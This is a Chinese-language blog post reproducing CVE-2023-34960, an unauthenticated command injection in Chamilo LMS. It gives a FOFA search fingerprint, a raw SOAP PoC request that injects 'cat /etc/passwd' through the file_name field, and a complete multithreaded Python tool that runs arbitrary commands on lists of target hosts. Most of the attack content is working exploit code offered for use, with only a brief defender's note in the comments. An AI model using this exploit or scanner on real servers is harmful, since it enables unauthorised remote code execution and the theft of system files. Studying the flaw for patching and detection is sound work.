【漏洞复现】CVE-2023-34960-Chamilo

  1. 【漏洞复现】CVE-2023-34960-Chamilo
  2. 工具地址
  3. 漏洞介绍
  4. fofa指纹
  5. 版本
  6. 复现
  7. poc
  8. 工具备份

【漏洞复现】CVE-2023-34960-Chamilo

工具地址

https://github.com/Pari-Malam/CVE-2023-34960

漏洞介绍

Chamilo 是一个电子学习平台，也称为学习管理系统（LMS）。Chamilo 的 additional_webservices.php 存在命令执行漏洞。

fofa指纹

"Chamilo"

版本

Chamilo <=1.11.18

复现

image-20230811194649111

poc

POST /main/webservices/additional_webservices.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 880
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip, deflate

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://mail.cosecadvirtual.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

工具备份

# Author: Pari Malam

import argparse
import random
import warnings
import requests
import os
import xml.etree.ElementTree as ET
from sys import stdout
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style

# Silence every warning category for the whole process. NOTE(review): this
# also hides whatever requests/urllib3 emit about the verify=False call in
# chamilo() below — presumably the intent, but it masks unrelated warnings too.
warnings.filterwarnings("ignore")

# Short colour aliases used by the status lines printed throughout the file.
FY = Fore.YELLOW
FG = Fore.GREEN
FR = Fore.RED
FC = Fore.CYAN
FW = Fore.WHITE

def clear():
    """Clear the terminal via the platform's shell command ('clear' or 'cls')."""
    if os.name == 'posix':
        screen_cmd = 'clear'
    else:
        screen_cmd = 'cls'
    os.system(screen_cmd)

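def mkdir():
    """Create the ``Results`` directory in the current working directory.

    Idempotent: an existing directory is left untouched. ``exist_ok=True``
    replaces the original ``exists``/``mkdir`` pair, which could raise
    ``FileExistsError`` if the directory appeared between the two calls.

    Raises:
        OSError: if the directory cannot be created (e.g. permissions, or a
            regular file named ``Results`` already occupies the path).
    """
    os.makedirs('Results', exist_ok=True)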

def banners():
    """Clear the terminal and print the tool banner with colorama colours.

    Writes straight to sys.stdout; the final print() ends with a style reset
    so later output is not coloured. Invoked once at module import time.
    """
    clear()
    stdout.write("                                                                                         \n")
    stdout.write(""+Fore.LIGHTRED_EX +"██████╗ ██████╗  █████╗  ██████╗  ██████╗ ███╗   ██╗███████╗ ██████╗ ██████╗  ██████╗███████╗   ██╗ ██████╗ \n")
    stdout.write(""+Fore.LIGHTRED_EX +"██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗  ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝   ██║██╔═══██╗\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║  ██║██████╔╝███████║██║  ███╗██║   ██║██╔██╗ ██║█████╗  ██║   ██║██████╔╝██║     █████╗     ██║██║   ██║\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║  ██║██╔══██╗██╔══██║██║   ██║██║   ██║██║╚██╗██║██╔══╝  ██║   ██║██╔══██╗██║     ██╔══╝     ██║██║   ██║\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║  ██║██╔══██╗██╔══██║██║   ██║██║   ██║██║╚██╗██║██╔══╝  ██║   ██║██╔══██╗██║     ██╔══╝     ██║██║   ██║\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██████╔╝██║  ██║██║  ██║╚██████╔╝╚██████╔╝██║ ╚████║██║     ╚██████╔╝██║  ██║╚██████╗███████╗██╗██║╚██████╔╝\n")
    stdout.write(""+Fore.LIGHTRED_EX +"╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═══╝╚═╝      ╚═════╝ ╚═╝  ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝ \n")
    stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════\n")
    stdout.write(""+Fore.YELLOW   +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR             "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   PARI MALAM                                    "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"╔════════════════════════════════════════════════════════════════════════════╝\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB             "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   GITHUB.COM/PARI-MALAM                         "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"╚════════════════════════════════════════════════════════════════════════════╝\n")
    # Style.RESET_ALL inside the string returns the terminal to default colours.
    print(f"{FY}[CVE-2023-34960] - {FG}Unauthenticated Command Injection\n{Style.RESET_ALL}")
# Module-level side effect: the screen is cleared and the banner printed at
# import time, not only when the file is run as a script.
banners()

def users_agents():
    """Load the User-Agent pool from ``lib/ua.txt``.

    Returns:
        The file's non-blank lines, each stripped of surrounding whitespace,
        in file order.

    Raises:
        FileNotFoundError: if ``lib/ua.txt`` is absent relative to the
            current working directory.
    """
    with open("lib/ua.txt", "r") as fh:
        stripped = map(str.strip, fh)
        return [agent for agent in stripped if agent]


def chamilo(url, command, user_agents):
    """Probe one host for CVE-2023-34960 and print/return the outcome.

    Args:
        url: host (optionally with path); leading/trailing '/' are stripped
            and the scheme is always forced to plain ``http://`` — a value
            that already carries a scheme is not recognised and is kept
            verbatim inside the resulting URL.
        command: string interpolated verbatim into the ``file_name`` item of
            the SOAP ``wsConvertPpt`` request body below.
        user_agents: list of User-Agent strings; one is chosen at random per
            request (``random.choice`` raises IndexError on an empty list).

    Returns:
        The text of the first ``<return>`` element found in a 200 response,
        or ``None`` for a transport error, a non-200 status, unparseable XML,
        or a response without a ``<return>`` element.

    Defender's notes: the request is a POST to
    ``/main/webservices/additional_webservices.php`` invoking ``wsConvertPpt``
    with shell metacharacters in ``file_name``; that endpoint/method pair is
    the thing to alert on, and the page lists Chamilo <= 1.11.18 as affected,
    so upgrading past that release is the mitigation.
    """
    url = "http://" + url.strip("/")
    body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
        <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
                <item>
                    <key xsi:type="xsd:string">file_data</key>
                    <value xsi:type="xsd:string"></value>
                </item>
                <item>
                    <key xsi:type="xsd:string">file_name</key>
                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{command}||a #</value>
                </item>
                <item>
                    <key xsi:type="xsd:string">service_ppt2lp_size</key>
                    <value xsi:type="xsd:string">720x540</value>
                </item>
            </param0>
        </ns1:wsConvertPpt>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

    # A different User-Agent per request; the body is sent as text/xml.
    headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}

    try:
        # verify=False disables TLS certificate checks; since the scheme is
        # forced to http:// above it only matters if the server redirects
        # to https (requests follows redirects by default).
        r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
    except Exception as e:
        # Every transport problem (timeout, DNS failure, refused connection,
        # ...) is reported as "Invalid"; the exception object is not used.
        print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid {Style.RESET_ALL}")
        return None

    # Only a 200 response is inspected; any other status code falls through
    # to the final `return None` without printing anything.
    if r.status_code == 200:
        try:
            pwned = ET.fromstring(r.text)
        except ET.ParseError:
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid XML Response{Style.RESET_ALL}")
            return None

        # First <return> element anywhere in the SOAP response (namespace-less).
        tagged = pwned.find('.//return')
        if tagged is not None:
            content = tagged.text  # None when the element is present but empty
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FG}[w00t!] - {FC}Vulnerable: {FW}{content}{Style.RESET_ALL}")
            return content
        else:
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not found on execution. Check manually.{Style.RESET_ALL}")
            return None

    return None



def main():
    """Parse the command line, fan out chamilo() over the targets, save results.

    Targets come from ``-f`` (one per line) or a single ``-u``; ``-c`` sets the
    command string (default below), ``-t`` the thread count and ``-o`` an
    output file that is appended to. Exits via ``parser.error`` (SystemExit)
    when neither ``-f`` nor ``-u`` is given.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL address (without 'http://' prefix)")
    parser.add_argument("-f", "--filename", help="File containing URLs")
    parser.add_argument("-c", "--command", help="Command to execute (optional)")
    parser.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
    parser.add_argument("-o", "--output", help="Output file for saving the results")
    args = parser.parse_args()

    # `or` chain: 'uname -a' is always truthy, so the trailing 'whoami' is
    # unreachable and the effective default is 'uname -a'.
    command = args.command or 'uname -a' or 'whoami'

    if args.filename:
        with open(args.filename, "r") as url_file:
            urls = url_file.readlines()
            # Both branches of the conditional are identical, so this is just
            # url.strip() for every line; a scheme prefix is neither removed
            # nor used here (chamilo() always prepends "http://").
            urls = [url.strip() if url.startswith(("http://", "https://")) else url.strip() for url in urls]
    elif args.url:
        urls = [args.url]
    else:
        parser.error(f"{FR}Whut are you doin bro?")

    max_workers = args.threads

    # Reads lib/ua.txt; a missing file raises FileNotFoundError uncaught here.
    user_agents = users_agents()

    results = []
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = [executor.submit(chamilo, url, command, user_agents) for url in urls]

        # Futures are consumed in submission order; the worker threads print
        # their own status lines, so console output may interleave.
        for future, url in zip(futures, urls):
            result = future.result()
            # Falsy results (None, or empty <return> text) count as failures.
            if result:
                results.append((url, result))
            else:
                print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not Vulnerable{Style.RESET_ALL}")

    if args.output:
        # Appends; the "Results/" prefix is only part of the written text —
        # nothing is stored under a Results directory, and mkdir() is not
        # called anywhere visible in this file.
        with open(args.output, "a") as file:
            for url, result in results:
                file.write(f"URL: {url}\nResult: Results/{result}\n\n")


# Script entry point; main() parses the CLI and drives the scan. Note that
# the banner is already printed above at import time regardless of this guard.
if __name__ == '__main__':
    main()

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。